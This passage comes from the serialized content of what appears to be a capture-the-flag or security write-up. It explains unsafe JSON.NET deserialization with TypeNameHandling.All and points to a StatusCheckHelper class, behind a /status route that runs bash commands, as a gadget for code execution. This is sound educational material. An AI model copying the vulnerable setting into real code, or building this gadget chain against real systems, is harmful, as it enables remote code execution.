get",{"type":33,"tag":128,"props":37873,"children":37874},{"style":312},[37875],{"type":38,"value":35231},{"type":33,"tag":128,"props":37877,"children":37878},{"style":300},[37879],{"type":38,"value":186},{"type":33,"tag":128,"props":37881,"children":37882},{"style":312},[37883],{"type":38,"value":35231},{"type":33,"tag":128,"props":37885,"children":37886},{"style":312},[37887],{"type":38,"value":37888}," }\n",{"type":33,"tag":128,"props":37890,"children":37891},{"class":130,"line":848},[37892,37896,37900,37905,37909,37913,37917,37921,37925],{"type":33,"tag":128,"props":37893,"children":37894},{"style":300},[37895],{"type":38,"value":37853},{"type":33,"tag":128,"props":37897,"children":37898},{"style":1576},[37899],{"type":38,"value":31859},{"type":33,"tag":128,"props":37901,"children":37902},{"style":135},[37903],{"type":38,"value":37904}," Age",{"type":33,"tag":128,"props":37906,"children":37907},{"style":312},[37908],{"type":38,"value":5642},{"type":33,"tag":128,"props":37910,"children":37911},{"style":300},[37912],{"type":38,"value":37871},{"type":33,"tag":128,"props":37914,"children":37915},{"style":312},[37916],{"type":38,"value":35231},{"type":33,"tag":128,"props":37918,"children":37919},{"style":300},[37920],{"type":38,"value":186},{"type":33,"tag":128,"props":37922,"children":37923},{"style":312},[37924],{"type":38,"value":35231},{"type":33,"tag":128,"props":37926,"children":37927},{"style":312},[37928],{"type":38,"value":37888},{"type":33,"tag":128,"props":37930,"children":37931},{"class":130,"line":976},[37932],{"type":33,"tag":128,"props":37933,"children":37934},{"style":312},[37935],{"type":38,"value":37888},{"type":33,"tag":128,"props":37937,"children":37938},{"class":130,"line":988},[37939],{"type":33,"tag":128,"props":37940,"children":37941},{"emptyLinePlaceholder":896},[37942],{"type":38,"value":899},{"type":33,"tag":128,"props":37944,"children":37945},{"class":130,"line":1001},[37946],{"type":33,"tag":128,"props":37947,"children":37948},{"emptyLinePlaceholder":896},[37949],{"type":38,"value":899},{"type":33,"tag":128,"props":37951,"children":37952},{"class":130,"line":1014},[37953,37957,37961],{"type":33,"tag":128,"props":37954,"children":37955},{"style":300},[37956],{"type":38,"value":25953},{"type":33,"tag":128,"props":37958,"children":37959},{"style":300},[37960],{"type":38,"value":6009},{"type":33,"tag":128,"props":37962,"children":37963},{"style":30339},[37964],{"type":38,"value":37965}," Program\n",{"type":33,"tag":128,"props":37967,"children":37968},{"class":130,"line":1026},[37969],{"type":33,"tag":128,"props":37970,"children":37971},{"style":312},[37972],{"type":38,"value":650},{"type":33,"tag":128,"props":37974,"children":37975},{"class":130,"line":1038},[37976,37980,37984,37989,37994],{"type":33,"tag":128,"props":37977,"children":37978},{"style":300},[37979],{"type":38,"value":37130},{"type":33,"tag":128,"props":37981,"children":37982},{"style":300},[37983],{"type":38,"value":25958},{"type":33,"tag":128,"props":37985,"children":37986},{"style":1576},[37987],{"type":38,"value":37988}," void",{"type":33,"tag":128,"props":37990,"children":37991},{"style":135},[37992],{"type":38,"value":37993}," Main",{"type":33,"tag":128,"props":37995,"children":37996},{"style":312},[37997],{"type":38,"value":7857},{"type":33,"tag":128,"props":37999,"children":38000},{"class":130,"line":1051},[38001],{"type":33,"tag":128,"props":38002,"children":38003},{"style":312},[38004],{"type":38,"value":12699},{"type":33,"tag":128,"props":38006,"children":38007},{"class":130,"line":1063},[38008,38013,38018,38022,38026,38031,38035,38039,38043,38047,38052,38056,38060,38064,38068,38073],{"type":33,"tag":128,"props":38009,"children":38010},{"style":30339},[38011],{"type":38,"value":38012}," Person",{"type":33,"tag":128,"props":38014,"children":38015},{"style":135},[38016],{"type":38,"value":38017}," person",{"type":33,"tag":128,"props":38019,"children":38020},{"style":312},[38021],{"type":38,"value":5657},{"type":33,"tag":128,"props":38023,"children":38024},{"style":300},[38025],{"type":38,"value":13061},{"type":33,"tag":128,"props":38027,"children":38028},{"style":30339},[38029],{"type":38,"value":38030}," Person",{"type":33,"tag":128,"props":38032,"children":38033},{"style":312},[38034],{"type":38,"value":5642},{"type":33,"tag":128,"props":38036,"children":38037},{"style":306},[38038],{"type":38,"value":37862},{"type":33,"tag":128,"props":38040,"children":38041},{"style":312},[38042],{"type":38,"value":5657},{"type":33,"tag":128,"props":38044,"children":38045},{"style":676},[38046],{"type":38,"value":679},{"type":33,"tag":128,"props":38048,"children":38049},{"style":140},[38050],{"type":38,"value":38051},"John",{"type":33,"tag":128,"props":38053,"children":38054},{"style":676},[38055],{"type":38,"value":669},{"type":33,"tag":128,"props":38057,"children":38058},{"style":312},[38059],{"type":38,"value":5584},{"type":33,"tag":128,"props":38061,"children":38062},{"style":306},[38063],{"type":38,"value":37904},{"type":33,"tag":128,"props":38065,"children":38066},{"style":312},[38067],{"type":38,"value":5657},{"type":33,"tag":128,"props":38069,"children":38070},{"style":523},[38071],{"type":38,"value":38072}," 30",{"type":33,"tag":128,"props":38074,"children":38075},{"style":312},[38076],{"type":38,"value":38077}," };\n",{"type":33,"tag":128,"props":38079,"children":38080},{"class":130,"line":1076},[38081],{"type":33,"tag":128,"props":38082,"children":38083},{"style":323},[38084],{"type":38,"value":29323},{"type":33,"tag":128,"props":38086,"children":38087},{"class":130,"line":1089},[38088,38093,38097,38101,38105,38109,38113,38117,38122],{"type":33,"tag":128,"props":38089,"children":38090},{"style":1576},[38091],{"type":38,"value":38092}," string",{"type":33,"tag":128,"props":38094,"children":38095},{"style":135},[38096],{"type":38,"value":10630},{"type":33,"tag":128,"props":38098,"children":38099},{"style":312},[38100],{"type":38,"value":5657},{"type":33,"tag":128,"props":38102,"children":38103},{"style":306},[38104],{"type":38,"value":37224},{"type":33,"tag":128,"props":38106,"children":38107},{"style":312},[38108],{"type":38,"value":215},{"type":33,"tag":128,"props":38110,"children":38111},{"style":135},[38112],{"type":38,"value":37233},{"type":33,"tag":128,"props":38114,"children":38115},{"style":312},[38116],{"type":38,"value":5566},{"type":33,"tag":128,"props":38118,"children":38119},{"style":306},[38120],{"type":38,"value":38121},"person",{"type":33,"tag":128,"props":38123,"children":38124},{"style":312},[38125],{"type":38,"value":5815},{"type":33,"tag":128,"props":38127,"children":38128},{"class":130,"line":1101},[38129,38134,38138,38143,38147,38151,38156,38160],{"type":33,"tag":128,"props":38130,"children":38131},{"style":306},[38132],{"type":38,"value":38133}," Console",{"type":33,"tag":128,"props":38135,"children":38136},{"style":312},[38137],{"type":38,"value":215},{"type":33,"tag":128,"props":38139,"children":38140},{"style":135},[38141],{"type":38,"value":38142},"WriteLine",{"type":33,"tag":128,"props":38144,"children":38145},{"style":312},[38146],{"type":38,"value":5566},{"type":33,"tag":128,"props":38148,"children":38149},{"style":676},[38150],{"type":38,"value":669},{"type":33,"tag":128,"props":38152,"children":38153},{"style":140},[38154],{"type":38,"value":38155},"Serialized Person:",{"type":33,"tag":128,"props":38157,"children":38158},{"style":676},[38159],{"type":38,"value":669},{"type":33,"tag":128,"props":38161,"children":38162},{"style":312},[38163],{"type":38,"value":5815},{"type":33,"tag":128,"props":38165,"children":38166},{"class":130,"line":1114},[38167,38171,38175,38179,38183,38187],{"type":33,"tag":128,"props":38168,"children":38169},{"style":306},[38170],{"type":38,"value":38133},{"type":33,"tag":128,"props":38172,"children":38173},{"style":312},[38174],{"type":38,"value":215},{"type":33,"tag":128,"props":38176,"children":38177},{"style":135},[38178],{"type":38,"value":38142},{"type":33,"tag":128,"props":38180,"children":38181},{"style":312},[38182],{"type":38,"value":5566},{"type":33,"tag":128,"props":38184,"children":38185},{"style":306},[38186],{"type":38,"value":633},{"type":33,"tag":128,"props":38188,"children":38189},{"style":312},[38190],{"type":38,"value":5815},{"type":33,"tag":128,"props":38192,"children":38193},{"class":130,"line":1127},[38194,38198,38203,38207,38211,38215,38219,38223,38228,38233,38237],{"type":33,"tag":128,"props":38195,"children":38196},{"style":30339},[38197],{"type":38,"value":38012},{"type":33,"tag":128,"props":38199,"children":38200},{"style":135},[38201],{"type":38,"value":38202}," deserializedPerson",{"type":33,"tag":128,"props":38204,"children":38205},{"style":312},[38206],{"type":38,"value":5657},{"type":33,"tag":128,"props":38208,"children":38209},{"style":306},[38210],{"type":38,"value":37224},{"type":33,"tag":128,"props":38212,"children":38213},{"style":312},[38214],{"type":38,"value":215},{"type":33,"tag":128,"props":38216,"children":38217},{"style":135},[38218],{"type":38,"value":37523},{"type":33,"tag":128,"props":38220,"children":38221},{"style":312},[38222],{"type":38,"value":5977},{"type":33,"tag":128,"props":38224,"children":38225},{"style":30339},[38226],{"type":38,"value":38227},"Person",{"type":33,"tag":128,"props":38229,"children":38230},{"style":312},[38231],{"type":38,"value":38232},">(",{"type":33,"tag":128,"props":38234,"children":38235},{"style":306},[38236],{"type":38,"value":633},{"type":33,"tag":128,"props":38238,"children":38239},{"style":312},[38240],{"type":38,"value":5815},{"type":33,"tag":128,"props":38242,"children":38243},{"class":130,"line":1139},[38244,38248,38252,38256,38260,38264,38269,38274,38278],{"type":33,"tag":128,"props":38245,"children":38246},{"style":306},[38247],{"type":38,"value":38133},{"type":33,"tag":128,"props":38249,"children":38250},{"style":312},[38251],{"type":38,"value":215},{"type":33,"tag":128,"props":38253,"children":38254},{"style":135},[38255],{"type":38,"value":38142},{"type":33,"tag":128,"props":38257,"children":38258},{"style":312},[38259],{"type":38,"value":5566},{"type":33,"tag":128,"props":38261,"children":38262},{"style":676},[38263],{"type":38,"value":669},{"type":33,"tag":128,"props":38265,"children":38266},{"style":151},[38267],{"type":38,"value":38268},"\\n",{"type":33,"tag":128,"props":38270,"children":38271},{"style":140},[38272],{"type":38,"value":38273},"Deserialized Person:",{"type":33,"tag":128,"props":38275,"children":38276},{"style":676},[38277],{"type":38,"value":669},{"type":33,"tag":128,"props":38279,"children":38280},{"style":312},[38281],{"type":38,"value":5815},{"type":33,"tag":128,"props":38283,"children":38284},{"class":130,"line":1152},[38285,38289,38293,38297,38301,38305,38310,38314,38318,38322,38326,38331,38335,38339,38344,38348,38352,38356,38360,38365],{"type":33,"tag":128,"props":38286,"children":38287},{"style":306},[38288],{"type":38,"value":38133},{"type":33,"tag":128,"props":38290,"children":38291},{"style":312},[38292],{"type":38,"value":215},{"type":33,"tag":128,"props":38294,"children":38295},{"style":135},[38296],{"type":38,"value":38142},{"type":33,"tag":128,"props":38298,"children":38299},{"style":312},[38300],{"type":38,"value":5566},{"type":33,"tag":128,"props":38302,"children":38303},{"style":676},[38304],{"type":38,"value":669},{"type":33,"tag":128,"props":38306,"children":38307},{"style":140},[38308],{"type":38,"value":38309},"Name:",{"type":33,"tag":128,"props":38311,"children":38312},{"style":676},[38313],{"type":38,"value":669},{"type":33,"tag":128,"props":38315,"children":38316},{"style":300},[38317],{"type":38,"value":8297},{"type":33,"tag":128,"props":38319,"children":38320},{"style":306},[38321],{"type":38,"value":38202},{"type":33,"tag":128,"props":38323,"children":38324},{"style":312},[38325],{"type":38,"value":215},{"type":33,"tag":128,"props":38327,"children":38328},{"style":306},[38329],{"type":38,"value":38330},"Name",{"type":33,"tag":128,"props":38332,"children":38333},{"style":300},[38334],{"type":38,"value":8297},{"type":33,"tag":128,"props":38336,"children":38337},{"style":676},[38338],{"type":38,"value":679},{"type":33,"tag":128,"props":38340,"children":38341},{"style":140},[38342],{"type":38,"value":38343}," Age:",{"type":33,"tag":128,"props":38345,"children":38346},{"style":676},[38347],{"type":38,"value":669},{"type":33,"tag":128,"props":38349,"children":38350},{"style":300},[38351],{"type":38,"value":8297},{"type":33,"tag":128,"props":38353,"children":38354},{"style":306},[38355],{"type":38,"value":38202},{"type":33,"tag":128,"props":38357,"children":38358},{"style":312},[38359],{"type":38,"value":215},{"type":33,"tag":128,"props":38361,"children":38362},{"style":306},[38363],{"type":38,"value":38364},"Age",{"type":33,"tag":128,"props":38366,"children":38367},{"style":312},[38368],{"type":38,"value":5815},{"type":33,"tag":128,"props":38370,"children":38371},{"class":130,"line":1165},[38372],{"type":33,"tag":128,"props":38373,"children":38374},{"style":312},[38375],{"type":38,"value":6760},{"type":33,"tag":128,"props":38377,"children":38378},{"class":130,"line":1177},[38379],{"type":33,"tag":128,"props":38380,"children":38381},{"style":312},[38382],{"type":38,"value":854},{"type":33,"tag":47,"props":38384,"children":38385},{},[38386],{"type":38,"value":38387},"The output of this code is as follows:",{"type":33,"tag":114,"props":38389,"children":38390},{"lang":25649},[38391],{"type":33,"tag":119,"props":38392,"children":38394},{"code":38393},"Serialized Person:\n{\"Name\":\"John\",\"Age\":30}\n\nDeserialized Person:\nName:John Age:30\n",[38395],{"type":33,"tag":105,"props":38396,"children":38397},{"__ignoreMap":8},[38398],{"type":38,"value":38393},{"type":33,"tag":81,"props":38400,"children":38402},{"id":38401},"so-what-is-the-problem",[38403],{"type":38,"value":38404},"So what is the problem?",{"type":33,"tag":47,"props":38406,"children":38407},{},[38408],{"type":38,"value":38409},"In our case, we have properly protected the deserialization, our data contains a simple JSON string representing a Person object.",{"type":33,"tag":47,"props":38411,"children":38412},{},[38413,38415,38421],{"type":38,"value":38414},"The unsafe use of deserialization occurs when the ",{"type":33,"tag":105,"props":38416,"children":38418},{"className":38417},[],[38419],{"type":38,"value":38420},"TypeNameHandling.All",{"type":38,"value":38422}," option is passed as the second parameter of deserialization. This option allows us to deserialize an object of our choice, and we can also set the values of the attributes of this object.",{"type":33,"tag":114,"props":38424,"children":38425},{"lang":35074},[38426],{"type":33,"tag":119,"props":38427,"children":38429},{"code":38428,"language":35074,"meta":8,"className":35079,"style":8},"// With safe deserialization\nPerson deserializedPerson = JsonConvert.DeserializeObject\u003CPerson>(json);\n\n// Without safe deserialization\nPerson deserializedPerson = JsonConvert.DeserializeObject\u003CPerson>(json, new JsonSerializerSettings {\n TypeNameHandling = TypeNameHandling.All\n});\n",[38430],{"type":33,"tag":105,"props":38431,"children":38432},{"__ignoreMap":8},[38433,38441,38488,38495,38503,38563,38586],{"type":33,"tag":128,"props":38434,"children":38435},{"class":130,"line":131},[38436],{"type":33,"tag":128,"props":38437,"children":38438},{"style":5541},[38439],{"type":38,"value":38440},"// With safe deserialization\n",{"type":33,"tag":128,"props":38442,"children":38443},{"class":130,"line":362},[38444,38448,38452,38456,38460,38464,38468,38472,38476,38480,38484],{"type":33,"tag":128,"props":38445,"children":38446},{"style":30339},[38447],{"type":38,"value":38227},{"type":33,"tag":128,"props":38449,"children":38450},{"style":135},[38451],{"type":38,"value":38202},{"type":33,"tag":128,"props":38453,"children":38454},{"style":312},[38455],{"type":38,"value":5657},{"type":33,"tag":128,"props":38457,"children":38458},{"style":306},[38459],{"type":38,"value":37224},{"type":33,"tag":128,"props":38461,"children":38462},{"style":312},[38463],{"type":38,"value":215},{"type":33,"tag":128,"props":38465,"children":38466},{"style":135},[38467],{"type":38,"value":37523},{"type":33,"tag":128,"props":38469,"children":38470},{"style":312},[38471],{"type":38,"value":5977},{"type":33,"tag":128,"props":38473,"children":38474},{"style":30339},[38475],{"type":38,"value":38227},{"type":33,"tag":128,"props":38477,"children":38478},{"style":312},[38479],{"type":38,"value":38232},{"type":33,"tag":128,"props":38481,"children":38482},{"style":306},[38483],{"type":38,"value":633},{"type":33,"tag":128,"props":38485,"children":38486},{"style":312},[38487],{"type":38,"value":5815},{"type":33,"tag":128,"props":38489,"children":38490},{"class":130,"line":403},[38491],{"type":33,"tag":128,"props":38492,"children":38493},{"emptyLinePlaceholder":896},[38494],{"type":38,"value":899},{"type":33,"tag":128,"props":38496,"children":38497},{"class":130,"line":739},[38498],{"type":33,"tag":128,"props":38499,"children":38500},{"style":5541},[38501],{"type":38,"value":38502},"// Without safe deserialization\n",{"type":33,"tag":128,"props":38504,"children":38505},{"class":130,"line":765},[38506,38510,38514,38518,38522,38526,38530,38534,38538,38542,38546,38550,38554,38559],{"type":33,"tag":128,"props":38507,"children":38508},{"style":30339},[38509],{"type":38,"value":38227},{"type":33,"tag":128,"props":38511,"children":38512},{"style":135},[38513],{"type":38,"value":38202},{"type":33,"tag":128,"props":38515,"children":38516},{"style":312},[38517],{"type":38,"value":5657},{"type":33,"tag":128,"props":38519,"children":38520},{"style":306},[38521],{"type":38,"value":37224},{"type":33,"tag":128,"props":38523,"children":38524},{"style":312},[38525],{"type":38,"value":215},{"type":33,"tag":128,"props":38527,"children":38528},{"style":135},[38529],{"type":38,"value":37523},{"type":33,"tag":128,"props":38531,"children":38532},{"style":312},[38533],{"type":38,"value":5977},{"type":33,"tag":128,"props":38535,"children":38536},{"style":30339},[38537],{"type":38,"value":38227},{"type":33,"tag":128,"props":38539,"children":38540},{"style":312},[38541],{"type":38,"value":38232},{"type":33,"tag":128,"props":38543,"children":38544},{"style":306},[38545],{"type":38,"value":633},{"type":33,"tag":128,"props":38547,"children":38548},{"style":312},[38549],{"type":38,"value":5584},{"type":33,"tag":128,"props":38551,"children":38552},{"style":300},[38553],{"type":38,"value":13061},{"type":33,"tag":128,"props":38555,"children":38556},{"style":30339},[38557],{"type":38,"value":38558}," JsonSerializerSettings",{"type":33,"tag":128,"props":38560,"children":38561},{"style":312},[38562],{"type":38,"value":762},{"type":33,"tag":128,"props":38564,"children":38565},{"class":130,"line":804},[38566,38570,38574,38578,38582],{"type":33,"tag":128,"props":38567,"children":38568},{"style":306},[38569],{"type":38,"value":37270},{"type":33,"tag":128,"props":38571,"children":38572},{"style":312},[38573],{"type":38,"value":5657},{"type":33,"tag":128,"props":38575,"children":38576},{"style":306},[38577],{"type":38,"value":37279},{"type":33,"tag":128,"props":38579,"children":38580},{"style":312},[38581],{"type":38,"value":215},{"type":33,"tag":128,"props":38583,"children":38584},{"style":306},[38585],{"type":38,"value":37288},{"type":33,"tag":128,"props":38587,"children":38588},{"class":130,"line":839},[38589],{"type":33,"tag":128,"props":38590,"children":38591},{"style":312},[38592],{"type":38,"value":5902},{"type":33,"tag":47,"props":38594,"children":38595},{},[38596],{"type":38,"value":38597},"If we execute the previous code with the TypeNameHandling.All option, we can see that the deserialization is done without any problem, but the output is different.",{"type":33,"tag":114,"props":38599,"children":38600},{"lang":25649},[38601],{"type":33,"tag":119,"props":38602,"children":38604},{"code":38603},"Serialized Person:\n{\"$type\":\"Person, ExampleNameSpace\",\"Name\":\"John\",\"Age\":30}\n",[38605],{"type":33,"tag":105,"props":38606,"children":38607},{"__ignoreMap":8},[38608],{"type":38,"value":38603},{"type":33,"tag":47,"props":38610,"children":38611},{},[38612,38614,38620,38622,38627],{"type":38,"value":38613},"We can see now the json contains an attribute ",{"type":33,"tag":105,"props":38615,"children":38617},{"className":38616},[],[38618],{"type":38,"value":38619},"$type",{"type":38,"value":38621}," with the value of the class followed by its namespace. Then, the elements following ",{"type":33,"tag":105,"props":38623,"children":38625},{"className":38624},[],[38626],{"type":38,"value":38619},{"type":38,"value":38628}," it's the attributes of the class (Name and Age).",{"type":33,"tag":47,"props":38630,"children":38631},{},[38632,38634],{"type":38,"value":38633},"The format of the JSON is different, ",{"type":33,"tag":2302,"props":38635,"children":38636},{},[38637],{"type":38,"value":38638},"but it is important to note that with this unsafe option, it is possible to deserialize the desired class instances.",{"type":33,"tag":47,"props":38640,"children":38641},{},[38642],{"type":38,"value":38643},"So if we recapitulate well, we are able to create a new instance of an object of our choice, and we can also set the values of the attributes of this object.",{"type":33,"tag":47,"props":38645,"children":38646},{},[38647,38649,38655],{"type":38,"value":38648},"If we take a closer look at the ",{"type":33,"tag":105,"props":38650,"children":38652},{"className":38651},[],[38653],{"type":38,"value":38654},"/status",{"type":38,"value":38656}," route, it uses a class that relies on system functions. This class could be interesting for us in our case because if we manage to deserialize an instance of this class, it will then be easy for us to execute arbitrary code.",{"type":33,"tag":114,"props":38658,"children":38659},{"lang":35074},[38660],{"type":33,"tag":119,"props":38661,"children":38663},{"code":38662,"language":35074,"meta":8,"className":35079,"style":8},"[Route(\"/status\")]\n[HttpGet]\npublic IActionResult Status()\n{\n StatusCheckHelper statusCheckHelper = new StatusCheckHelper();\n\n statusCheckHelper.command = \"bash /tmp/cpu.sh\";\n string cpuUsage = statusCheckHelper.output;\n\n statusCheckHelper.command = \"bash /tmp/mem.sh\";\n string memoryUsage = statusCheckHelper.output;\n\n statusCheckHelper.command = \"bash /tmp/disk.sh\";\n string diskUsage = statusCheckHelper.output;\n\n return Content($\"CPU Usage: {cpuUsage}\\nMemory Usage: {memoryUsage}\\nDisk Space: {diskUsage}\");\n}\n",[38664],{"type":33,"tag":105,"props":38665,"children":38666},{"__ignoreMap":8},[38667,38700,38715,38735,38742,38772,38779,38817,38850,38857,38893,38925,38932,38968,39000,39007,39097],{"type":33,"tag":128,"props":38668,"children":38669},{"class":130,"line":131},[38670,38674,38679,38683,38687,38691,38695],{"type":33,"tag":128,"props":38671,"children":38672},{"style":312},[38673],{"type":38,"value":344},{"type":33,"tag":128,"props":38675,"children":38676},{"style":30339},[38677],{"type":38,"value":38678},"Route",{"type":33,"tag":128,"props":38680,"children":38681},{"style":312},[38682],{"type":38,"value":5566},{"type":33,"tag":128,"props":38684,"children":38685},{"style":676},[38686],{"type":38,"value":669},{"type":33,"tag":128,"props":38688,"children":38689},{"style":140},[38690],{"type":38,"value":38654},{"type":33,"tag":128,"props":38692,"children":38693},{"style":676},[38694],{"type":38,"value":669},{"type":33,"tag":128,"props":38696,"children":38697},{"style":312},[38698],{"type":38,"value":38699},")]\n",{"type":33,"tag":128,"props":38701,"children":38702},{"class":130,"line":362},[38703,38707,38711],{"type":33,"tag":128,"props":38704,"children":38705},{"style":312},[38706],{"type":38,"value":344},{"type":33,"tag":128,"props":38708,"children":38709},{"style":30339},[38710],{"type":38,"value":36626},{"type":33,"tag":128,"props":38712,"children":38713},{"style":312},[38714],{"type":38,"value":3262},{"type":33,"tag":128,"props":38716,"children":38717},{"class":130,"line":403},[38718,38722,38726,38731],{"type":33,"tag":128,"props":38719,"children":38720},{"style":300},[38721],{"type":38,"value":25953},{"type":33,"tag":128,"props":38723,"children":38724},{"style":30339},[38725],{"type":38,"value":35103},{"type":33,"tag":128,"props":38727,"children":38728},{"style":135},[38729],{"type":38,"value":38730}," Status",{"type":33,"tag":128,"props":38732,"children":38733},{"style":312},[38734],{"type":38,"value":7857},{"type":33,"tag":128,"props":38736,"children":38737},{"class":130,"line":739},[38738],{"type":33,"tag":128,"props":38739,"children":38740},{"style":312},[38741],{"type":38,"value":650},{"type":33,"tag":128,"props":38743,"children":38744},{"class":130,"line":765},[38745,38750,38755,38759,38763,38768],{"type":33,"tag":128,"props":38746,"children":38747},{"style":30339},[38748],{"type":38,"value":38749}," StatusCheckHelper",{"type":33,"tag":128,"props":38751,"children":38752},{"style":135},[38753],{"type":38,"value":38754}," statusCheckHelper",{"type":33,"tag":128,"props":38756,"children":38757},{"style":312},[38758],{"type":38,"value":5657},{"type":33,"tag":128,"props":38760,"children":38761},{"style":300},[38762],{"type":38,"value":13061},{"type":33,"tag":128,"props":38764,"children":38765},{"style":30339},[38766],{"type":38,"value":38767}," StatusCheckHelper",{"type":33,"tag":128,"props":38769,"children":38770},{"style":312},[38771],{"type":38,"value":15496},{"type":33,"tag":128,"props":38773,"children":38774},{"class":130,"line":804},[38775],{"type":33,"tag":128,"props":38776,"children":38777},{"emptyLinePlaceholder":896},[38778],{"type":38,"value":899},{"type":33,"tag":128,"props":38780,"children":38781},{"class":130,"line":839},[38782,38787,38791,38796,38800,38804,38809,38813],{"type":33,"tag":128,"props":38783,"children":38784},{"style":306},[38785],{"type":38,"value":38786}," statusCheckHelper",{"type":33,"tag":128,"props":38788,"children":38789},{"style":312},[38790],{"type":38,"value":215},{"type":33,"tag":128,"props":38792,"children":38793},{"style":306},[38794],{"type":38,"value":38795},"command",{"type":33,"tag":128,"props":38797,"children":38798},{"style":312},[38799],{"type":38,"value":5657},{"type":33,"tag":128,"props":38801,"children":38802},{"style":676},[38803],{"type":38,"value":679},{"type":33,"tag":128,"props":38805,"children":38806},{"style":140},[38807],{"type":38,"value":38808},"bash /tmp/cpu.sh",{"type":33,"tag":128,"props":38810,"children":38811},{"style":676},[38812],{"type":38,"value":669},{"type":33,"tag":128,"props":38814,"children":38815},{"style":312},[38816],{"type":38,"value":5676},{"type":33,"tag":128,"props":38818,"children":38819},{"class":130,"line":848},[38820,38825,38830,38834,38838,38842,38846],{"type":33,"tag":128,"props":38821,"children":38822},{"style":1576},[38823],{"type":38,"value":38824}," string",{"type":33,"tag":128,"props":38826,"children":38827},{"style":135},[38828],{"type":38,"value":38829}," cpuUsage",{"type":33,"tag":128,"props":38831,"children":38832},{"style":312},[38833],{"type":38,"value":5657},{"type":33,"tag":128,"props":38835,"children":38836},{"style":306},[38837],{"type":38,"value":38754},{"type":33,"tag":128,"props":38839,"children":38840},{"style":312},[38841],{"type":38,"value":215},{"type":33,"tag":128,"props":38843,"children":38844},{"style":306},[38845],{"type":38,"value":15036},{"type":33,"tag":128,"props":38847,"children":38848},{"style":312},[38849],{"type":38,"value":5676},{"type":33,"tag":128,"props":38851,"children":38852},{"class":130,"line":976},[38853],{"type":33,"tag":128,"props":38854,"children":38855},{"emptyLinePlaceholder":896},[38856],{"type":38,"value":899},{"type":33,"tag":128,"props":38858,"children":38859},{"class":130,"line":988},[38860,38864,38868,38872,38876,38880,38885,38889],{"type":33,"tag":128,"props":38861,"children":38862},{"style":306},[38863],{"type":38,"value":38786},{"type":33,"tag":128,"props":38865,"children":38866},{"style":312},[38867],{"type":38,"value":215},{"type":33,"tag":128,"props":38869,"children":38870},{"style":306},[38871],{"type":38,"value":38795},{"type":33,"tag":128,"props":38873,"children":38874},{"style":312},[38875],{"type":38,"value":5657},{"type":33,"tag":128,"props":38877,"children":38878},{"style":676},[38879],{"type":38,"value":679},{"type":33,"tag":128,"props":38881,"children":38882},{"style":140},[38883],{"type":38,"value":38884},"bash /tmp/mem.sh",{"type":33,"tag":128,"props":38886,"children":38887},{"style":676},[38888],{"type":38,"value":669},{"type":33,"tag":128,"props":38890,"children":38891},{"style":312},[38892],{"type":38,"value":5676},{"type":33,"tag":128,"props":38894,"children":38895},{"class":130,"line":1001},[38896,38900,38905,38909,38913,38917,38921],{"type":33,"tag":128,"props":38897,"children":38898},{"style":1576},[38899],{"type":38,"value":38824},{"type":33,"tag":128,"props":38901,"children":38902},{"style":135},[38903],{"type":38,"value":38904}," memoryUsage",{"type":33,"tag":128,"props":38906,"children":38907},{"style":312},[38908],{"type":38,"value":5657},{"type":33,"tag":128,"props":38910,"children":38911},{"style":306},[38912],{"type":38,"value":38754},{"type":33,"tag":128,"props":38914,"children":38915},{"style":312},[38916],{"type":38,"value":215},{"type":33,"tag":128,"props":38918,"children":38919},{"style":306},[38920],{"type":38,"value":15036},{"type":33,"tag":128,"props":38922,"children":38923},{"style":312},[38924],{"type":38,"value":5676},{"type":33,"tag":128,"props":38926,"children":38927},{"class":130,"line":1014},[38928],{"type":33,"tag":128,"props":38929,"children":38930},{"emptyLinePlaceholder":896},[38931],{"type":38,"value":899},{"type":33,"tag":128,"props":38933,"children":38934},{"class":130,"line":1026},[38935,38939,38943,38947,38951,38955,38960,38964],{"type":33,"tag":128,"props":38936,"children":38937},{"style":306},[38938],{"type":38,"value":38786},{"type":33,"tag":128,"props":38940,"children":38941},{"style":312},[38942],{"type":38,"value":215},{"type":33,"tag":128,"props":38944,"children":38945},{"style":306},[38946],{"type":38,"value":38795},{"type":33,"tag":128,"props":38948,"children":38949},{"style":312},[38950],{"type":38,"value":5657},{"type":33,"tag":128,"props":38952,"children":38953},{"style":676},[38954],{"type":38,"value":679},{"type":33,"tag":128,"props":38956,"children":38957},{"style":140},[38958],{"type":38,"value":38959},"bash /tmp/disk.sh",{"type":33,"tag":128,"props":38961,"children":38962},{"style":676},[38963],{"type":38,"value":669},{"type":33,"tag":128,"props":38965,"children":38966},{"style":312},[38967],{"type":38,"value":5676},{"type":33,"tag":128,"props":38969,"children":38970},{"class":130,"line":1038},[38971,38975,38980,38984,38988,38992,38996],{"type":33,"tag":128,"props":38972,"children":38973},{"style":1576},[38974],{"type":38,"value":38824},{"type":33,"tag":128,"props":38976,"children":38977},{"style":135},[38978],{"type":38,"value":38979}," diskUsage",{"type":33,"tag":128,"props":38981,"children":38982},{"style":312},[38983],{"type":38,"value":5657},{"type":33,"tag":128,"props":38985,"children":38986},{"style":306},[38987],{"type":38,"value":38754},{"type":33,"tag":128,"props":38989,"children":38990},{"style":312},[38991],{"type":38,"value":215},{"type":33,"tag":128,"props":38993,"children":38994},{"style":306},[38995],{"type":38,"value":15036},{"type":33,"tag":128,"props":38997,"children":38998},{"style":312},[38999],{"type":38,"value":5676},{"type":33,"tag":128,"props":39001,"children":39002},{"class":130,"line":1051},[39003],{"type":33,"tag":128,"props":39004,"children":39005},{"emptyLinePlaceholder":896},[39006],{"type":38,"value":899},{"type":33,"tag":128,"props":39008,"children":39009},{"class":130,"line":1063},[39010,39014,39018,39022,39027,39032,39036,39041,39045,39049,39054,39058,39063,39067,39071,39076,39080,39085,39089,39093],{"type":33,"tag":128,"props":39011,"children":39012},{"style":1576},[39013],{"type":38,"value":13056},{"type":33,"tag":128,"props":39015,"children":39016},{"style":135},[39017],{"type":38,"value":35967},{"type":33,"tag":128,"props":39019,"children":39020},{"style":312},[39021],{"type":38,"value":5566},{"type":33,"tag":128,"props":39023,"children":39024},{"style":676},[39025],{"type":38,"value":39026},"$\"",{"type":33,"tag":128,"props":39028,"children":39029},{"style":140},[39030],{"type":38,"value":39031},"CPU Usage: ",{"type":33,"tag":128,"props":39033,"children":39034},{"style":312},[39035],{"type":38,"value":7246},{"type":33,"tag":128,"props":39037,"children":39038},{"style":140},[39039],{"type":38,"value":39040},"cpuUsage",{"type":33,"tag":128,"props":39042,"children":39043},{"style":312},[39044],{"type":38,"value":5730},{"type":33,"tag":128,"props":39046,"children":39047},{"style":151},[39048],{"type":38,"value":38268},{"type":33,"tag":128,"props":39050,"children":39051},{"style":140},[39052],{"type":38,"value":39053},"Memory Usage: 